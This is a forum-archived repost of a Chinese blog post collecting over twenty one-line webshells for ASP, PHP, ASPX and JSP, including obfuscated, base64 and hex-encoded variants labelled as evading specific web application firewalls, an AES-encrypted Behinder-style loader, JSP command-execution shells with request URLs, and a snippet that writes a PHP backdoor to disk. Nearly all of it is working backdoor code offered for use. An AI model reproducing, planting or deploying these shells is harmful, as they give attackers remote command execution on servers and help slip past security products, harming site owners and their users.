PHP、asp、aspx、JSP一句话

上善若水知足常乐 發表於 2019-10-11 14:07:00

<h1 class="postTitle">PHP、asp、aspx、JSP一句话</h1>
<div class="clear">原文地址：https://www.cnblogs.com/JoEcO01/p/11556413.html </div>
<div class="postBody">
<div id="cnblogs_post_body" class="blogpost-body ">
<div>1、asp一句话木马：</div>
<div><%eval request(“x”)%></div>
<div>2、php一句话木马：</div>
<div><?php eval($_POST);?></div>
<div>3、aspx一句话：</div>
<div><%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%></div>
<div>4、数据库加密一句话(密码a)：</div>
<div>┼攠数畣整爠焕敌瑳∨≡┩忾</div>
<div>5、网站配置、版权信息专用一句话：</div>
<div>”%><%Eval Request(x)%></div>
<div>6、一句话再过护卫神：</div>
<div><%Y=request(“x”)%> <%execute(Y)%></div>
<div>7、过拦截一句话木马：</div>
<div><% eXEcGlOBaL ReQuEsT(“x”) %></div>
<div>8、asp闭合型一句话:</div>
<div>%><%eval request(“0o1Znz1ow”)%><%</div>
<div>9、能过安全狗的解析格式：</div>
<div>;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg </div>
<div>10、突破安全狗的一句话：</div>
<div><%Y=request(“x”)%> <%eval(Y)%></div>
<div>11、elong过安全狗的php一句话：</div>
<div><?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST); ?></div>
<div>12、突破护卫神，保护盾一句话：</div>
<div><?php $a = str_replace(x,”",”axsxxsxexrxxt”);</div>
<div>$a($_POST["test"]); ?></div>
<div>13、高强度php一句话：</div>
<div><?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?></div>
<div> </div>
<div>14、后台常用写入php一句话（密码x）：</div>
<div><?</div>
<div>$fp = @fopen(“c.php”, ‘a’);</div>
<div>f@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST)’.”\r\n\r\n?”.”>\r\n”);</div>
<div>@fclose($fp);</div>
<div>?></div>
<div> </div>
<div>15、许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传，这样一句话木马就写入不进数据库了。</div>
<div>‘ E& Y; Y1 R$ s# ]. L$ c改成：〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script</div>
<div>这样就避开了使用〈%%〉，保存为.ASP,程序照样执行的效果是一样的</div>
<div> </div>
<div>16、PHP高强度一句话：</div>
<div><?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?> 菜刀连接：/x.php?x=lostwolf 脚本类型：php 密码：c</div>
<div><?php assert($_REQUEST["c"]);?> 菜刀连接躲避检测密码：c</div>
<div> </div>
<div>17、突破安全狗的aspx的一句话：</div>
<div><%@ Page Language=”C#” ValidateRequest=”false” %></div>
<div><%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%></div>
<div> </div>
<div> 18、php变异一句话：</div>
<div>
<div><?php ${"\x47L\x4f\x42\x41LS"}["\x6c\x68\x73l\x61wk"]="c";$kvbemdpsn="c";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x78a\x77\x67\x6d\x6d\x70\x6c\x77o"]="b\x6b\x66";${"GLOBx41Lx53"}["x70txx75x76x74uijx6d"]="x76bl";${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x6f\x6fl\x72\x7a"]="\x62\x6b\x66";${${"\x47\x4cO\x42\x41\x4c\x53"}["p\x74xu\x76\x74\x75\x69\x6a\x6d"]}=str_replace("\x74\x69","","\x74\x69st\x69t\x74ir\x74i\x5frt\x69\x65\x74\x69pl\x74i\x61t\x69\x63\x65");${${"G\x4cO\x42\x41\x4cS"}["\x68\x78\x61\x77gm\x6d\x70\x6c\x77\x6f"]}=${${"G\x4c\x4f\x42\x41\x4cS"}["\x70t\x78\x75\x76\x74\x75ijm"]}("\x6b","","\x6b\x62\x61k\x73\x6b\x65\x36\x6b\x34k\x5fkdk\x65\x6b\x63\x6b\x6f\x6b\x64ke");${${"\x47L\x4f\x42ALS"}["lh\x73\x6c\x61\x77\x6b"]}=${${"\x47\x4cO\x42A\x4c\x53"}["g\x6f\x6f\x6cr\x7a"]}("YX\x4ezZX\x49=").@$_GET["n"]."x74";@${$kvbemdpsn}($_POST["59f1f"]);echo "ax62cx61x62cabx63n";?></div>
<div> </div>
<div>19、绕阿里云冰蝎php</div>
<div><%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extend\u0073 ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%></div>
<div> </div>
<div>20、JSP一句话收集
<div><%</div>
<div>if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());</div>
<div>%></div>
<div>在浏览器地址栏输入http://127.0.0.1:8080/222.jsp?f=1.txt&t=hello world</div>
<div>然后再输入http://127.0.0.1:8080/test/1.txt</div>
<div> </div>
<div>21、jsp无回显执行系统命令：</div>
<div>
<div><%Runtime.getRuntime().exec(request.getParameter("i"));%></div>
<div>请求：http://127.0.0.1:8080/Shell/cmd2.jsp?i=ls</div>
<div>执行之后不会有任何回显，用来反弹个shell很方便。</div>
<div> </div>
<div>22、jsp有回显带密码验证的:
<div>
<div><%</div>
<div>if("023".equals(request.getParameter("pwd"))){</div>
<div>java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();</div>
<div>int a = -1;</div>
<div>byte[] b = new byte;</div>
<div>out.print("<pre>");</div>
<div>while((a=in.read(b))!=-1){</div>
<div>out.println(new String(b));</div>
<div>}</div>
<div>out.print("</pre>");</div>
<div>}</div>
<div>%></div>
</div>
<div>请求：http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls</div>
<div> </div>
<div>23、JSP</div>
<div>
<div><%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %></div>
<div><html></div>
<div><head></div>
<div><title></title></div>
<div><meta http-equiv="Content-Type" content="text/html; charset=big5"></div>
<div></head></div>
<div><body></div>
<div><%</div>
<div>Runtime runtime = Runtime.getRuntime();</div>
<div>Process process =null;</div>
<div>String line=null;</div>
<div>InputStream is =null;</div>
<div>InputStreamReader isr=null;</div>
<div>BufferedReader br =null;</div>
<div>String ip=request.getParameter("cmd");</div>
<div>try</div>
<div>{</div>
<div>process =runtime.exec(ip);</div>
<div>is = process.getInputStream();</div>
<div>isr=new InputStreamReader(is);</div>
<div>br =new BufferedReader(isr);</div>
<div>out.println("<pre>");</div>
<div>while( (line = br.readLine()) != null )</div>
<div>{</div>
<div>out.println(line);</div>
<div>out.flush();</div>
<div>}</div>
<div>out.println("</pre>");</div>
<div>is.close();</div>
<div>isr.close();</div>
<div>br.close();</div>
<div>}</div>
<div>catch(IOException e )</div>
<div>{</div>
<div>out.println(e);</div>
<div>runtime.exit(1);</div>
<div>}</div>
<div>%></div>
<div></body></div>
<div></html></div>
<div>24、aspx木马收集：
<div> </div>
<div><%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%></div>
<div>随日期变化的连接密码, Asp.NET服务端写法：</div>
<div><%@ Page Language="Jscript"%><%eval(Request.Item,"unsafe");%></div>
<div>例如：菜刀的密码为chopper，在前面加三个字符,新密码为：{D}chopper</div>
<div><%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%></div>
<div> </div>
<p> </p>
<div><script runat="server" language="JScript"></div>
<div>function popup(str) {</div>
<div>var q = "u";</div>
<div>var w = "afe";</div>
<div>var a = q + "ns" + w;</div>
<div>var b= eval(str,a);</div>
<div>return(b);</div>
<div>}</div>
<div></script></div>
<div><%</div>
<div>popup(popup(System.Text.Encoding.GetEncoding(65001).</div>
<div>GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));</div>
<div>%></div>
<div>密码 z</div>
<div> </div>
<div> </div>
<p> </p>
<div><%@ Page Language="Jscript" validateRequest="false" %></div>
<div><%</div>
<div>var keng </div>
<div>keng = Request.Item["never"];</div>
<div>Response.Write(eval(keng,"unsafe"));</div>
<div>%></div>
<div> </div>
<p> </p>
<div><%@ Page Language = Jscript %></div>
<div><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/</div>
<div>"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+</div>
<div>"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+</div>
<div>","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval</div>
<div>(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%></div>
<div>密码 -7</div>
<p> </p>
<div><%@PAGE LANGUAGE=JSCRIPT%></div>
<div><%var PAY:String=Request["\x61\x62\x63\x64"];</div>
<div>eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");</div>
<div>%></div>
<div>密码 abcd</div>
<p> </p>
<div><%@PAGE LANGUAGE=JSCRIPT%></div>
<div><%var PAY:String=</div>
<div>Request["\x61\x62\x63\x64"];eval</div>
<div>(PAY,"\x75\x6E\x73\x61"+</div>
<div>"\x66\x65");%></div>
<div> </div>
<div>过狗过D盾一句话</div>
<p> </p>
<div><%@ Page Language="Jscript" Debug=true%></div>
<div><%</div>
<div>var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));</div>
<div>var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));</div>
<div>var c=eval(a,b);</div>
<div>eval(c,b);</div>
<div>%></div>
<div> </div>
<p> </p>
<div><%@ Page Language="Jscript" Debug=true%></div>
<div><%</div>
<div>var a=Request.Form["pass"];</div>
<div>var b="unsa",c="fe",d=b+c;</div>
<div>function fun()</div>
<div>{</div>
<div>return a;</div>
<div>}</div>
<div>eval(fun(),d);</div>
<div>%></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div><br><br>
来源：https://www.cnblogs.com/despotic/p/11653848.html

頁: [1]

琼殿技术论坛's Archiver

PHP、asp、aspx、JSP一句话